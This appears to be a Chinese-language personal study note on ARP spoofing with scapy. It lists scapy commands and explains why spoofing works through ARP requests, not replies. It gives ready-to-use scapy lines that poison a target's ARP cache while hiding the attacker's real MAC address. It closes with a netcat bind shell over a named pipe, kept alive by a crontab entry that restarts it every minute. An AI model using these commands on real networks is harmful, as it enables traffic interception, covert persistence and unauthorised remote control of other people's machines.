scapy 中的ARP

scapy 常用命令

ls() //查看支持的协议对象
lsc() //查看函数
show() //查看数据包结构
send() //三层发包
sr() //三层收发
sr1() //三层收发只收一 timeout指定超时 verbose指定详情
sendp() //二层发包
srp() //二层收发
srp1() //二层收发只收一 timeout指定超时 verbose指定详情

为什么选用op=1(who has)能欺骗成功， 而op=2(is-at)无法欺骗成功？

分析：

使用whohas 时，攻击机发送 who has 192.168.10.66 tell 192.168.10.1

所以当66主机接受到该询问包时，就会记录发送请求的 源IP 和 源MAC ，

而源IP是假的， 所以欺骗成功

而 使用is-at时，攻击机先询问 who has 192.168.10.66 tell 192.168.10.16

16是攻击机，所以此时目标66收到该询问包时就已经记录了 192.168.10.16 和 16的MAC

地址映射，而后发送的 192.168.10.1 is at 16的MAC 就已经没有用了

总结：

ARP欺骗一台主机，只有通过发送ARP请求包，对方才收到请求自己的MAC地址时，

会把源IP和源MAC映射记录，这一过程是欺骗的关键，也就是被动欺骗，通过op=2

主动和对方说某IP是某MAC地址这样的方式是不会被记录的。

为什么欺骗成功后，自己的真实的IP-MAC会被目标记录

因为如果直接ARP发包，不指名 Ether包，系统默认会先去请求目标端mac地址

这个过程就被记录了真实的，然后通过返回的目标mac构造第二层数据帧来发送

只要自己发送广播帧，就可以避免请求查询mac地址的这一过程，从而避免漏出痕迹

下面发包不带痕迹清理
send(ARP(psrc="192.168.10.1", pdst="192.168.10.66"));

下面是两个有效的发包（带痕迹清理）

监听模式
sendp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(psrc="192.168.10.1", pdst="192.168.10.66"))

防护模式
sendp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(psrc="192.168.10.16", hwsrc="8c:89:a5:8f:4a:d7", pdst="192.168.10.66"))

mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/sh 2>&1 | nc -l 端口 > /tmp/tmp_fifo
----------------------------------------------------------------
crontab -e
* * * * * sleep 0;cat /tmp/tmp_fifo | /bin/sh 2>&1 | nc -l 端口 > /tmp/tmp_fifo

每分钟执行一次命令